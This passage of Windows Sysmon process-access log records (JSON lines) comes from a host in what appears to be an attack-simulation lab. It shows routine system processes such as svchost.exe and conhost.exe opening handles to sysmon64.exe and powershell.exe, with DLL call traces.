PCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.584\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.584","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.600\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.600","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.615\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nSourceProcessId: 4852\r\nSourceThreadId: 4820\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program 